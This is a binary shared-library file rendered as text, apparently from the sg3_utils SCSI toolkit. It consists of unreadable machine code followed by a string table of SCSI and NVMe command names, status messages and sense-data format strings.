   H��$�   躝��L��H�=nP  H��1��v���聝��I��H������L��H�=�P  1��T����   �j���A���j���f�1�L��H�=|( �/������  A��   H�N  H�5$( HN�H�=vG  1�����   �����H��A9�AN�E1������fD  L��L�\$H�D$(    �&quot;���H�|$H�T$(�Ɖ�菣��A�Ń���   ��$�   ��&lt;q��   H�|$�   ��蟜��H����   �@����E����   ���}   H�\$A�   H���g���H�D$(��[��� L��A�#   �j������B���L���:������3���A���+��� H�=�% 1����D��1�H�����E1�����D  1��������H�t$(��1�A��H�=�! 軠������fD  ��$�   �����1���訜���     ��AWf�AVAUA��ATE��UL��SH��  H��$P  ��$`  H�D$��$X  �D$dH�%(   H��$  1���  )�$�   )�$�   f��$�   )�$�   )�$�   )�$�   @��tƄ$�   ��t��$�   D��H�L�=�&#039; H��$�   f��f��$�   ���  �К��I��H���7  H��H��$�   �   菡��L��$�   �@   L��L��L�\$�r���D��H��L������ٺ&lt;   D��L��蒝���L$A��L����L�L$$L��踟��L�\$���A����  A���t��~	E����   E1��&amp;fD  D�d$$A���!  A�D$��    DF�L���p���H��$  dH+%(   �,  H��  D��[]A\A]A^A_�@ L�D$0��   1Ҿ   H��$�   �ҙ��L��H�=�L  H��1�莞��虙��I��H������L��H�=�L  1��l����   肝��A���j���f.�     1�L��H�=�$ �?������  A��   H�)J  H�54$ HN�H�=�C  1������   �����H��A9�AN�E1��������fD  L��L�\$H�D$(    �2���H�|$H�T$(�Ɖ�蟟��A�Ń���   ��$�   ��&lt;q��   H�|$�   ��诘��H����   �@����E����   ���}   H�\$A�   H���_���H�D$(��S��� L��A�#   �z������:���L���J������C���A���#��� H�=�! 1��
���D��1�H������E1����D  1������H�t$(��1�A��H�=  �˜������fD  ��$�   �����1���踘���     ��AWf��AVAUATM��U��SH��  H��$H  H�\$��$P  �\$��$X  dH�%(   H��$�   1�Ƅ$�    HǄ$�       Ƅ$�   ?)�$�   )�$�   )�$�   )�$�   @��tƄ$�   ���t��$�   @��t��$�    ��$@  A�L�=�# D��$�   f��f��$�   ����   �ʖ��I��H���!  H��H��$�   �
   艝��L��$�   �@   L��L���q�����$@  L��L������ٺ&lt;   ��L��莙���L$A��L����L�L$L��贛������k  E1��t;L��諙��H��$�   dH+%(   ��  H��  D��[]A\A]A^A_��    D�d$A����   A�D$��    DF��fD  L�D$ ��   1Ҿ
   H��$�   ���L��H�=�H  H��1�螚��評��I��H������L��H�=�H  1��|����   蒙��A���?���f.�     H�D$    L��诚��H�T$L��Ɖ�����A�ǃ���   ��$�   ��&lt;q��   �   ��L���0���H��tk�@����E����   ����   H�\$A�   H�������H�D$����L��A�#   �����������L���ғ�����˘��A���p��� 1Ƀ��b���H�t$A��H�=� 1��~����F���f�     ��$�   �����\�������c��� ��AW1�A�҉�AVf�AUATM��U��SH��  H��$H  H�\$��$P  �\$��$X  dH�%(   H��$�   1�@��f��$�   �Ƅ$�   ���)�$�   Ǆ$�       ��o)�$�   )�$�   )�$�   E��t��@��$�   ��t��$�    ��$@  I�L�=b  L��$�   f��f��$�   ����   �t���I��H���#  H��H��$�   �   �3���L��$�   �@   L��L��������$@  L��L��詒���ٺ&lt;   ��L���8����L$A��L����L�L$L���^�������e  E1��t=L���U���H��$�   dH+%(   ��  H��  D��[]A\A]A^A_�f�     D�d$A����   A�D$��    DF��fD  L�D$ ��   1Ҿ   H��$�   芒��L��H�=&gt;E  H��1��F����Q���I��H������L��H�=eE  1��$����   �:���A���=���f�H�D$    L���_���H�T$L��Ɖ��Θ��A�ǃ���   ��$�   ��&lt;q��   �   ��L�����H��tk�@����E��t^��tZH�L$A�   H�������H�D$�����     L��A�#   貒���������L��肐�����{���A���v��� 1����h���H�t$��1�A��H�=` �+����I���fD  ��$�   �����\��������     ��AW��f�A�AVA��AUL�-N[  ATU��1�SH��  H��$P  ��$`  L��$@  H�D$��$X  �D$dH�%(   H��$�   1��	HǄ$�   /   ��f��$�   	�D��$�   ��)�$�   ����)�$�   E�fA��)�$�   fD��$�   ��$�   )�$�   ���  �8���I��H����  H��H��$�   �
   ���L��$�   �@   L��L���ߔ����$H  ��t�ٺ&lt;   ��L�������L$A��L���L�L$L���)��������  E1��tXL��� ���H��$�   dH+%(   ��  H��  D��[]A\A]A^A_�@ ��$H  L��L������u���f�     D�d$A����   A�D$��    DF��fD  1Ҿ
   L�D$ ��   H��$�   �:���L��H�=�A  H��1�����������E�������M���������$H  ��������  9�$H  N�$H  H�5� H�=� A��H��?  HN�1�蕓��1҃�D����L��蒔��荎��I��H���U����L��H�=�A  1��_����   �u���A�����D  H�D$    L��藓��H�T$L�����������x���H�\$A�   H���d���H�D$��X���L��A�#   �2������B���L�����������A���+����ގ��ff.�      ��AW��f�I�AVA��A�AUL�-�\  ATU��SH��  H��$X  ��$h  L��$H  H�D$��$`  �D$dH�%(   H��$�   1��	HǄ$�   �   ��)�$�   	�)�$�   ��)�$�   ����HǄ$�       E�L��$�   D��$�   ��$�   ��$@  )�$�   ����$�   ���  ���I��H����  H��H��$�   �   覓��L��$�   �@   L��L��莑����$P  ��s�ٺ&lt;   ��L��貏���L$A��L���L�L$L���ؑ�������  E1��tWL���Ϗ��H��$�   dH+%(   ��  H��  D��[]A\A]A^A_� ��$P  L��L��螋���v���f�     D�d$A����   A�D$��    DF��fD  1Ҿ   L�D$ ��   H��$�   ���L��H�=�&gt;  H��1�覐���������E�������M���������$P  ��������  9�$P  N�$P  H�5M H�=Y A��H�Q&lt;  HN�1��E���1҃�D����L���B����=���I��H���V����L��H�=P&gt;  1������   �%���A�����D  H�D$    L���G���H�T$L����踑�����y���H�\$A�   H���e���H�D$H��X����    L��A�#   �ڋ�����;���L��誉����裎��A���$���膋��fD  ��AWf�AVAUATUSH��H  H��$�  L�D$L�L$ L��$�  H�D$H��$�  H�D$(dH�%(   H��$8  1�)�$�  )�$   )�$  )�$   )�$�  )�$�  )�$�  )�$�  H���  ����A��Hc�H��$�  �    �C���Ƅ$�    ��tV�� �u  ���,  H�=� 1�A�����耎��H��$8  dH+%(   �  H��H  D��[]A\A]A^A_�@ H��$�  Ƅ$�  �H��$�  ��$�  ��$�  ��$�  f��$�  H�sW  H�D$M���D$��$�  ?�D$�#  ��$�  M��L$���  D��$�  E��t:�� �w  1҉�L�D$0��   H��$�  �܈��H�t$H�=�;  H��1�薍��衈��I��H���  H��H��$�  ���c����T$L��L���T�����$�  ��~H�t$H����  ��$�  L��謇��E��&lt;   ��L��DN�$�  D���L������s  ����  ~gD��$�  E��uCL��資�����
���H�o ��Hc�H�&gt;���    �D$@   L��$�  ���� ��H�t$H�= ��1�行����$�  L����   �K�������  H� ��Hc�H�&gt;���    H��$�  Ƅ$�  �H��$�  ��$�  f��$�  H�BW  H�D$�!����    ��Ƅ$�  �o�$�  f��$�  ��$�  Ƅ$�  ��$�  ��$�  �$�  f��$�  H�,B  H�D$��� H�D$ H���~�����$�  H��L���8����g��� �ˊ���ƅ��q  L���I�������  H�- ��Hc�H�&gt;��D  D��$�  E����  �    A�����L��������D  D��$�  E��~�|$ tA�E  H�D$H��tD��$�  E��~�  L��草��A����     ��$�  ��~�|$ tA�E  H�D$H��t��$�  ��~�  H�\$(H��tD��$�  E���  E1��T���fD  M9�t�|$ ��  H�|$ tD��$�  E����  H�\$(H���\�����$�  ���M���L���*�����&gt;��� ��$�  �����H��$�   �   L��A������V���H�t$H�=� H��1�� ������ ��$�  �������f�     H��$�   �   L��A�����蕄��H�t$H�=v H��1�诉���`���f.�     D��$�  E���?���H�t$H�=� 1��|����&#039;����    H�t$H�=�7  1�A������W�������f�H�t$H�=� 1��=���������    H��$�  �6�������H�=� 1�����L���ʃ����w&quot;H�� ��Hc�H�&gt;��$�  �������L��A�����蕃��H�t$H�=)
 ��1�����q��� H�t$H�= 1�A�����蟈���P���f.�     L��E1��e�����4���fD  �t$�	   L��臃��H��H����   �@��9�$�  N�$�  ����   ���   ��������H�L$���������H�L$�T�f�T����@ L���X���9�$�  L��L��N�$�  Hc�諅���N���fD  H�D$�  �T�����$�  A��������.���H�=� 袇������H�H�\$H���H�{H�L�H��H�L�H��H)��H)�����H�����H�L$����T��T������Y���f�     ��AWf�L�=� AVAUA��ATE��UL��SH��  ��$@  ��$H  �D$dH�%(   H��$�   1�1�HǄ$�   &lt;   f��$�   �����$�   ��$�   ��f����f��$�   ��$�   D���)�$�   ��$�   D��f��)�$�   f��$�   )�$�   )�$�   ����   �x���I��H���  H��H��$�   �
   �7���H��$�   �@   L���&quot;���D��H��L��蔀���ٺ&lt;   D��L���B����L$A��L����L�L$L���h���A�ă����   A�����   ��~	E����   E1�L���I���H��$�   dH+%(   �U  H��  D��[]A\A]A^A_�D  L�D$ ��   1Ҿ
   H��$�   誀��L��H�=^3  H��1��f����q���I��H�������L��H�=�3  1�A������&gt;����p���f�     D�d$A�D$��    DB��D���D  L��A�#   �B������)���L�����������A������ 1�L��H�= �τ����uJA��   H��0  H�5�
 HN�H�=*  1�裄���   �����H��A9�AN�E1�藅�����f�H�=F	 1��r���D��1�H���u���E1�����h����     ��AWf��L�= AVAUA��ATE��UL��SH��  ��$@  ��$H  �D$dH�%(   H��$�   1�1�HǄ$�   ;   f��$�   ��f����@��$�   ��$�   D�����$�   ��$�   D��f��f��$�   f��$�   )�$�   )�$�   )�$�   )�$�   ����   �~��I��H����  H��H��$�   �
   �H���H��$�   �@   L���3���D��H��L����}���ٺ&lt;   D��L���S����L$A��L����L�L$L���y�������  E1��uD�d$A�D$��    DB�L���Z���H��$�   dH+%(   �C  H��  D��[]A\A]A^A_�fD  1�L�D$ ��   �
   H��$�   �}��L��H�=n0  H��1��v�������H���������E������1�L��H�=9 �H�������   A��   H�2.  H�5= HN�H�=�&#039;  1������   �����H��A9�AN������|���f.�     L��A�#   �&quot;~���������L����{�������A����� L��H�=�/  1�A�����詁������@ H�=f 1�蒁��1�D��H��蕂�������}��ff.�     ��AWf��AVAUATUSH��  ��$P  D��$@  D��$H  �\$��$X  dH�4%(   H��$�   1�1�HǄ$�   ;   f��$�   )�$�   )�$�   )�$�   )�$�   A����� �2  A����� �  ������$�   A��	�L�͈�$�   D��fA��fD��$�   ����$�   D�����$�   D��f��f��$�   ����   E��&lt;   DN��t{��I��H����  H��H��$�   �
   �3���H��$�   �@   L������D��H��L���z����D��D��L���@~���L$A��L����L�L$H�5XF  �b��������   E1��uD�d$A�D$��    DB�L���C~��H��$�   dH+%(   �A  H��  D��[]A\A]A^A_��    1�L�D$ ��   �
   H��$�   �z��H�=� H��1��a������H����������E������A��   H�7+  H�51 HF�H�= 1�����   �����H��A9�AF���������    L��A�#   �*{��������L���x������}��A��� ���H�5� H�=u  1�A������~�����H�5� H�=%  1�A������~������H�5� H�=�,  1�A������p~������vz��fD  ��AWf��AVAUA��ATE��UL��SH��  ��$@  �|$�\$��$H  dH�%(   H��$�   1�1�HǄ$�   B   f��$�   )�$�   )�$�   )�$�   )�$�   @��tƄ$�   E��&lt;   L�=� DN����$�   D��f��f��$�   ����   �x��I��H���k  H��H��$�   �
   �f��H��$�   �@   L���Q}��D��H��L����w���t$��D��L���r{���L$A��L����L�L$L���}�������   E1��uD�d$A�D$��    DB�L���y{��H��$�   dH+%(   ��   H��  D��[]A\A]A^A_�D  1�L�D$ ��   �
   H��$�   ��w��L��H�=�*  H��1��|������H���������E������L��H�=x 1��h|�������D��H���h}����� L��A�#   �x�����9���L���Rv�����K{��A���&quot;��� L��H�=P*  1�A������	|�������x��ff.�     @ ��H��E�ɋD$PAQE��I�ȉщ�1���w��H����    ��AWf�L�=� AVA��AUATI��U��SD��H��  �L$dH�%(   H��$�   1�1�Ǆ$�      f��$�   )�$�   )�$�   )�$�   )�$�   E����   �Kv��I��H���  H��H��$�   �   �
}��H��$�   �@   L���z��D��L��L���gu����ٺ&lt;   L���y���L$A��L����L�L$L���&lt;{���Ń����   �����   ��~����   E1�L��� y��H��$�   dH+%(   �K  H��  D��[]A\A]A^A_�@ L�D$ ��   1Ҿ   H��$�   �u��L��H�=6(  H��1��&gt;z���Iu��I��H�������L��H�=](  1�A������z���q����D�d$A�D$��    DB��M���D  L��A�#   �&quot;v�����2���L����s������x��A������ 1�L��H�=��  �y����uJ��   H��%  H�5��  HN�H�=�  1��y���   L�����9�N�E1��zz�����D  H�=&amp;�  1��Ry��L��1҉��Vz��E1�����Iu��f�     ��AWf�AVAUI�͹@   ATE��U��S����   H��H  �T$L�|$ D��$�  D�L$M��dH�%(   H��$8  1�)�$�   HǄ$�   �   HǄ$�       )�$   )�$  )�$   �*y�������$�   ����   �D$��$�   D��ȉ�$�   E����   �os��H��H���&amp;  H��H��$�   �   �.z��H��$�   �@   H���x��D��L��H���r��D��&lt;   ��H���9v���L$E��L����L�L$H���_x�������   E1��uD�d$A�D$��    DB�H���@v��H��$8  dH+%(   ��   H��H  D��[]A\A]A^A_�@ �E��������D$ȉ�$�   ���f�L�D$`��   1Ҿ   H��$�   �r��L��H�=6%  H��1��&gt;w���Ir��H��H������L��H�=]%  1�A������w���Q����H��A�#   �Bs�����2���H���q�����v��A��������r��ff.�      ��AWf�L�=  AVA��AUI��ATA��USD��H��  �L$dH�%(   H��$�   1���HǄ$�       �)�$�   HǄ$�   �   ��$�   )�$�   )�$�   )�$�   E����   �Lq��H��H���h  H��H��$�   �   �x��H��$�   �@   H���u��D��L��H���p���ٺ&lt;   D��H���t���L$A��L����L�L$H���&lt;v�������   E1��uD�d$A�D$��    DB�H���t��H��$�   dH+%(   ��   H��  D��[]A\A]A^A_Ð1�L�D$ ��   �   H��$�   �p��L��H�=6#  H��1��&gt;u������M���������E�����L��H�= �  1��u�������D��L���v����� H��A�#   �*q�����=���H���n������s��A���&amp;��� L��H�=�&quot;  1�A������t�������p���    ��AWf�AVA��AUA����   ATE��UL��SH��X  ��$�  �T$1�L�|$ �L$M���P   ��$�  �D$dH�%(   H��$H  1�)�$   HǄ$�   �   HǄ$�       )�$  )�$   )�$0  �t��D�����$�   A����   A����  A����  ��$�  ȉ�$�   E��&lt;   DN����   �n��I��H���  H��H��$�   �   �xu��H��$   �@   L���cs����$�  H��L����m����D��D��L���q���L$A��L����L�L$L���s������v  E1����   L���q��H��$H  dH+%(   ��  H��X  D��[]A\A]A^A_�fD  A����   �D$E��ȉ�$�   �&lt;   DN������1�L�D$p��   H��$�   �   ��m��L��H�=�   H��1��r������H������������$�  �������L��H�=g�  1��Wr����$�  �����H���Ss�����fD  D�d$A�D$��    DB����D  D��H�5� 1�A�����H�=�  �q������D  �D$ȉ�$�   ��$�  ȉ�$�   �D$����$�   ����    L��A�#   ��m���������L���k�����p��A���i��� L��H�=�  1�A������qq���R����wm���    ��AWf�AVAUA��ATUL��SH��  ��$P  D��$H  ��$X  �D$dH�%(   H��$�   1�)�$�   )�$�   )�$�   )�$�   )�$�   @���#  L��H�� ��  �Ƅ$�   +L�=�5  A�
   ��$�   E��&lt;   DN���l  �k��H��H����  H��H��$�   D���pr��H��$�   �@   H���[p��D���D��H���n��A�Ņ�uH����n��A�ă��@  �L$L�L$A��D��L��H���p�������  E1��uD�d$A�D$��    DB�H���vn��H��$�   dH+%(   �6  H��  D��[]A\A]A^A_�f.�     A�τ��-  L��H�� ��   A����  ��   Ƅ$�   4��tƄ$�   ��$@  fA���L�=A5  ��$�   A�
   fD��$�   ��?E�䈄$�   �&lt;   DN�������D  L�D$ ��   1�H��$�   D���Lj��L��H�=   H��1��o���j��H��H���d���L��H�=&#039;  1�A�������n����� ��u�|$ tE�����H��  H��8  D�L$H9�H��  H�5d HF�H�=!�  1��n��D�L$D  Ƅ$�   �E��tƄ$�   ��$@  H�A�H��$�   D��$�   L�=X8  A�   ��?��$�   ���f�     H��A�#   �bj��������H���2h�����+m��A������ �������H�5�  H�=!�  1���m������D  A�����������H��2  H�5|  1�H�=�  �m������i��@ ��AW��f��L�=.�  AVf��A��AUATUSD��H��xD�D$dH�%(   H�D$h1��D$    H�D$�   @�t$f�T$f�L$E����   �Ch��I��H����   H��H�t$�   �o��H�t$ �@   L����l���ٺ&lt;   D��L���!k���L$A��L����L�L$L���Gm�������   E1����   L���8k��H�D$hdH+%(   ��   H��xD��[]A\A]A^A_�f�L��H�l$H�=0�  �|l��L�l$ L�%��  �u L��1�H���^l��L9�u�H�=&quot;  1��Kl���Vg��I��H������L��H�=j  1�A������#l���f���fD  D�l$A��w]�   D��H��d
  �7���E1�  0 A��A���#��� L��A�#   �h�����
���L����e������j��A���� A���������g����AWAVAUATUSH��x�|$1���$�   D�L$dH�%(   H�D$h1�f�|$H�D$F   ���  @�t$����  ��  ��E��f��f�D$A����  ��  D��H��L�=�  f��f�D$����   �f��I��H���!  H��H�t$�
   ��l��H�t$ �@   L����j��D��H��L���8e���t$�ٺ&lt;   L����h���L$A��L����L�L$L���k�������  �����   ��~	���  E1�L����h��H�D$hdH+%(   �$  H��xD��[]A\A]A^A_�f.�     L��H�=��  1��/j��H�D$ L�t$H�$L�-��  f.�     A�6L��1�I���i��L;4$u�H�=�  1���i���d��I��H������L��H�=	  1�A�������i���M���D  D�d$A���  A���$���A��	����~A�������DE��	����A�D$��������DC���f.�     �U 1�L��H�=H�  ʅ�H�9�N�A��1��;i����u~A��   H�)  H�54�  HN�H�=�  1��i���   �����H��A9�AN�E1��j���v���fD  L��A�#   �e�����Z���L����b������g��A���C��� H�=~�  1��h��D��1�H���i��E1�����D  A�����������H�=J�  1�A������oh�������H�=��  1�A������Th������H�=�  A������=h�������Cd�� ��AWAVAUATUSH��x��$�   �|$��$�   �D$dH�%(   H�D$h1��D$    H�D$�   ����  �@�t$�T$����  ��  f��f�L$A���   ��  D�D$L��L�=��  ����   �b��I��H���  H��H�t$�   �gi��H�t$ �@   L���Ug����$�   H��L����a���t$�ٺ&lt;   L���pe���L$A��L����L�L$L���g�������  �����   ��~	���  E1�L���{e��H�D$hdH+%(   �  H��xD��[]A\A]A^A_�D  L��L�t$L�l$ 1�H�=i�  L�%.�  �f��fD  A�6L��1�I���f��M9�u�H�=Z  1��f���a��I��H�����L��H�=�  1�A������[f���[���fD  D�l$A���  A���1���A��	�*���~A�������DE�����f�     A�E��������DC���� �U 1�L��H�=1�  ʅ�H�9�N�A��1���e����u~A��   H��  H�5��  HN�H�=  1��e���   �����H��A9�AN�E1��f�����fD  L��A�#   �a�����g���L���_�����{d��A���P��� H�=�  1��Be��D��1�H���Ef��E1��*���D  A�����������H�=7�  1�A������e������H�=�  A�������d����D��H�=�  1�A�������d��������`��f.�     ��AWL�=�  AVAUATA��USD��H��x�|$H�$D�D$dH�%(   H�D$h1����D$    f��@�t$H�D$�   f�D$E����   �e_��I��H����  H��H�t$�   �&#039;f��H�t$ �@   L���d��H�4$D��L���^���t$�ٺ&lt;   L���3b���L$A��L����L�L$L���Yd������  E1����   L���Jb��H�D$hdH+%(   �A  H��xD��[]A\A]A^A_�@ L��H�l$L�t$ 1�H�=9�  L�-��  �~c��fD  �u L��1�H���fc��I9�u�1�H�=(  �Sc������H�&lt;$ �������E������L��H�=3�  1��#c��H�&lt;$�����D���&quot;d�����D  D�d$A��w}�   D��H��d
  ����E1�  0 A��A������ L��A�#   �_�������L����\������a��A������ L��H�=�  1�A������b�����@ A���������^����H��H���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Data parameters segment descriptor Field pointer:  Field pointer:
  bit %d
 Actual retry count:  Progress indication:  %d.%02d%%
 Segment pointer:
 Sense_key: 0x%x unexpected
    &gt;&gt; descriptor too short %.76s
 %.2x SG3_UTILS_DSENSE Unknown status [0x%x] %s  invalid value: 0x%x Additional sense:  Additional sense: %s ASC=%02x, ASCQ=%02x (hex) bad pdt bad tpi conventional sequential write required sequential write preferred sequential or before required gap unknown [0x%x] Variable length Vendor specific [0x%x] Opcode=0x%x Reserved [0x%x] %s, %s %s service action=0x%x &lt;null&gt; command pointer Vendor specific opcode: 0x%x Unknown opcode: 0x%x SPC %s SPC Reserved SBC %s SBC Reserved SSC %s SSC Reserved ZBC %s ZBC Reserved [unrecognized PDT] %s %i OS error:  %s%s %s%s
 Bad sense category Sense category: %d %-*s   %s
 %sTransport Id of initiator:
 %s  FCP-2 World Wide Name:
 %s  TPID format: %d
 %s  IEEE 1394 EUI-64 name:
 %s  iSCSI  name: %.*s
 %s  SAS address: 0x%lx
 %s  ADT:
 %s  ATAPI:
 %s  UAS:
 %s  SOP  Routing ID: 0x%x
 %s  PCIE:
 %s  No specified protocol
 %s      [0x %s  %s:
 %s    designator type:  ,  code set:  %s     transport: %s
 %s      vendor specific:
 %s      vendor id: %.8s
 %s      vendor specific: 0x %s      0x %s      Directory ID: 0x%x
 %s      SCSI name string:
 %s      %.*s
 %s &gt;&gt;&gt; sense buffer empty
 Fixed format, current %s%s; Sense key: %s
 Fixed format, &lt;&lt;&lt;deferred&gt;&gt;&gt; Unknown response code: 0x%x Response code: 0x0 (?)   Info fld=0x%x [%u]   FMK  EOM  ILI %s  Segment pointer:  overflow flag is %d
 %s  lba=0x%x
 , calculated_len=%d
 %.50s         Descriptor format, current clear %.60s   %s  Descriptor type:  Information:  Valid=0 (-&gt; vendor specific)  Command specific:  Field replaceable unit code:  Stream commands:  FILEMARK End Of Medium (EOM) Block commands:  OSD object identification
 OSD attribute identification
 ATA Status Return:  device=0x%x status=0x%x
 Another progress indication:  %d.02%d%%
 User data segment referral:  %s   Not all referrals: %d
 %s    Descriptor %d
 %s      first uds LBA: 0x%lx
 %s      last uds LBA:  0x%lx
 active/optimized active/non optimized transitioning between states unknown: 0x%x %s        tpg: %d  state: %s
 Forwarded sense data
 %s    FSDT: %s
 %s    Sense data source:  Extended copy command %s source device
 destination device %s %s %d
 unknown [%d]
 %s    Forwarded status: %s
 %s vvvvvvvvvvvvvvvv
 %s ^^^^^^^^^^^^^^^^
 Direct-access block device
 %s    Sense key specific:  %s    Information: 0x %s    Command specific: 0x Device designation
 %s    Usage reason: %s
 Microcode activation  time:  unknown
 NVMe Status:  DNR=%d, M=%d,  SCT_SC=0x%x
     %s
 Vendor specific [0x%x]
 Unknown [0x%x]
 
%s     %s    short descriptor
 lba=0x%02x%02x%02x  %.4x %.39s
 %.47s
  	  	,#- %x%c %d%c%c%c unrecognized multiplier
 %lx%c %lx %ld%c%c%c %ld %s: bad arguments
 read from binary file %s: %s
 read from binary pipe %s: %s
 %4x %s: array length exceeded
 0123456789aAbBcCdDeEfF ,	 %2x %10x psz=%u, rp=%p
 %s: posix_ma, len=%d,  wrkBuffp=%p,  1.99 20210830 pass-through %s: %s os error: %s
 %s: bad %s setup
 %s: %s timeout
       duration=%lu ns
       duration=%u ms
 in), got out) but reported  sent %s: scsi status: %s
 %s: transport: %s
 %s: os: %s
 request sense     %s cdb: %s
 Got NULL `resp` pointer inquiry %s: got too few bytes (%d)
 %s: out of memory
 test unit ready report luns Close zone Finish zone Open zone Reset write pointer Sequentialize zone Report zones Report realms Report zone domains Zone activate Zone query write data to echo buffer activate deferred microcode overwrite block erase cryptographic erase exit failure mode short form - block id short form - vendor specific long form extended form attribute values attribute list logical volume list partition list supported attributes read data from echo buffer echo buffer descriptor error history Receive copy status(LID1) Receive copy data(LID1) Receive copy status Receive copy data Receive ROD token information Report all ROD tokens Report tape stream mirroring Extended copy(LID1) Extended copy Populate token Write using token Set tape stream mirroring Copy operation abort register reserve release preempt preempt and abort register and move replace lost reservation read keys read reservation report capabilities read full status Test bind Prepare bind report Set affiliation Bind Unbind Write long(16) Write scattered(16) Receive binding report Read capacity(16) Read long(16) Get LBA status(16) Report referrals Stream control Background control Get stream status Get physical element status Remove element and truncate Restore elements and rebuild Set medium attribute Impossible command name Read media serial number Attach to component device Exchange p_extent Instruct component device Set identifying information Set target port groups Change aliases Remove I_T nexus Set priority Set timestamp Management protocol out Report component device Report peripheral device Report states Report device identification Report unconfigured capacity Report target port groups Report aliases Report priority Report timestamp Management protocol in Rebuild(32) Regenerate(32) Xdread(32) Xdwrite(32) Xdwrite extended(32) Xpwrite(32) Xdwriteread(32) Xdwrite extended(64) Read(32) Verify(32) Write(32) Write and verify(32) Write same(32) Orwrite(32) Atomic write(32) Write stream(32) Write scattered(32) Get LBA status(32) Receive credential ATA pass-through(32) Format OSD (osd) Create (osd) List (osd) Read (osd) Write (osd) Append (osd) Flush (osd) Remove (osd) Create partition (osd) Remove partition (osd) Get attributes (osd) Set attributes (osd) Create and write (osd) Create collection (osd) Remove collection (osd) List collection (osd) Set key (osd) Set master key (osd) Flush collection (osd) Flush partition (osd) Flush OSD (osd) Format OSD (osd-2) Create (osd-2) List (osd-2) Punch (osd-2) Read (osd-2) Write (osd-2) Append (osd-2) Flush (osd-2) Clear (osd-2) Remove (osd-2) Create partition (osd-2) Remove partition (osd-2) Get attributes (osd-2) Set attributes (osd-2) Create and write (osd-2) Create collection (osd-2) Remove collection (osd-2) List collection (osd-2) Set key (osd-2) Set master key (osd-2) Flush collection (osd-2) Flush partition (osd-2) Flush OSD (osd-2) Query (osd-2) Remove member objects (osd-2) Get member attributes (osd-2) Set member attributes (osd-2) Read map (osd-2) Perform SCSI command (osd-2) Perform SCSI command (osd) Unknown resend this command to: 2.83 20211007 Successful completion Invalid command opcode Invalid field in command Command id conflict Data transfer error Internal error Command abort requested Invalid namespace or format Command sequence error Data SGL length invalid Matadata SGL length invalid SGL descriptor type invalid PRP offset invalid Atomic write unit exceeded Operation denied SGL offset invalid Reserved [0x17] Keep alive timeout expired Keep alive timeout invalid Sanitize failed Sanitize in progress Namespace is write protected Command interrupted Transient transport error LBA out of range Capacity exceeded Namespace not ready Reservation conflict Format in progress Completion queue invalid Invalid queue identifier Invalid queue size Abort command limit exceeded Reserved [0x104] Invalid firmware slot Invalid firmware image Invalid interrupt vector Invalid log page Invalid format Invalid queue deletion Feature not changeable Overlapping range Reserved [0x107] Namespace already attached Namespace is private Namespace not attached Controller list invalid Device self-test in progress Invalid controller identifier Invalid resource identifier ANA group identifier invalid ANA attach failed Conflicting attributes Write fault Unrecovered read error End-to-end guard check error Compare failure Access denied Discovery 2016 SBC Base 2010 SBC Base 2016 Basic provisioning 2016 Drive maintenance 2016 Host Aware 2020 Host Managed 2020 Domains and Realms 2020 Flush Write Read Write Uncorrectable Compare Write Zeroes Dataset Management Reservation Register Reservation Report Reservation Acquire Reservation Release Delete I/O Submission Queue Create I/O Submission Queue Get Log Page Delete I/O Completion Queue Create I/O Completion Queue Identify Abort Set Features Get Features Asynchronous Event Request Namespace Management Firmware commit Firmware image download Device Self-test Namespace Attachment Keep Alive Directive Send Directive Receive Virtualization Management NVMe-MI Send NVMe-MI Receive Doorbell Buffer Config NVMe over Fabrics Format NVM Security Send Security Receive Sanitize Get LBA status Test Unit Ready Rezero Unit Rewind Request Sense Format Unit Format medium Format Read Block Limits Reassign Blocks Initialize element status Read(6) Write(6) Print Seek(6) Set capacity Slew and print Read reverse(6) Write filemarks(6) Synchronize buffer Space(6) Inquiry Verify(6) Recover buffered data Mode select(6) Reserve(6) Reserve element(6) Release(6) Release element(6) Copy Erase(6) Mode sense(6) Start stop unit Load unload Stop print Receive diagnostic results Send diagnostic Prevent allow medium removal Read Format capacities Set window Read capacity(10) Read card capacity Read(10) Read generation Write(10) Seek(10) Locate(10) Position to element Erase(10) Read updated block Write and verify(10) Verify(10) Search data high(10) Search data equal(10) Search data low(10) Set limits(10) Pre-fetch(10) Read position Synchronize cache(10) Lock unlock cache(10) Read defect data(10) Format with preset scan Medium scan Copy and verify Write buffer Read buffer(10) Update block Read long(10) Write long(10) Change definition Write same(10) Unmap Read sub-channel Read TOC/PMA/ATIP Report density support Play audio(10) Get configuration Play audio msf Get event status notification Pause/resume Log select Log sense Stop play/scan Xdwrite(10) Xpwrite(10) Read disk information Xdread(10) Read track information Xdwriteread(10) Send OPC information Mode select(10) Reserve(10) Reserve element(10) Release(10) Release element(10) Repair track Mode sense(10) Close track/session Read buffer capacity Send cue sheet Persistent reserve in Persistent reserve out Extended cdb (XCBD) Xdwrite extended(16) Write filemarks(16) Rebuild(16) Read reverse(16) Regenerate(16) Third party copy out Third party copy in ATA pass-through(16) Access control in Access control out Read(16) Compare and write Write(16) Orwrite(16) Read attribute Write attribute Write and verify(16) Verify(16) Pre-fetch(16) Synchronize cache(16) Space(16) Lock unlock cache(16) Locate(16) Write same(16) Erase(16) ZBC out ZBC in Write stream(16) Read buffer(16) Write atomic(16) Service action bidirectional Service action in(16) Service action out(16) Report luns ATA pass-through(12) Blank Security protocol in Maintenance in Send key Maintenance out Report key Move medium Play audio(12) Exchange medium Load/unload medium Move medium attached Set read ahead Read(12) Service action out(12) Write(12) Service action in(12) erase(12) Get performance Read DVD/BD structure Write and verify(12) Verify(12) Search data high(12) Search data equal(12) Search data low(12) Set limits(12) Read element status attached Security protocol out Send volume tag Set streaming Read defect data(12) Read element status Read CD msf Redundancy group in Scan Redundancy group out Set CD speed Spare in Spare out Mechanism status Volume set in Read CD Volume set out Send DVD/BD structure No errors may also convey true Syntax error Device not ready type: sense key Medium or hardware error Illegal request Unit attention Data protect type: sense key + asc,ascq Copy aborted Aborted command Miscompare File error No sense key Recovered error (warning) tye: sense key type: SCSI status Condition met Busy Task set full ACA aactive Task aborted Contradict Logic error SCSI command timeout Windows error number doesn&#039;t fit in 7 bits Transport error driver or interconnect error No errors (false) An OS error occurred (errno &gt; 46 or negative) Malformed SCSI command trouble building command Some other sense error Some other error Parameter list length error Invalid field in parameter Target underrun Target overrun Operation in progress See leave_reason for error signal # 0 ?? Windows error number? vendor specific [0x0] T10 vendor identification EUI-64 based NAA Relative target port Target port group Logical unit group MD5 logical unit identifier SCSI name string UUID identifier Reserved [0xb] Reserved [0xc] Reserved [0xd] Reserved [0xe] Reserved [0xf] Addressed logical unit Target port Reserved 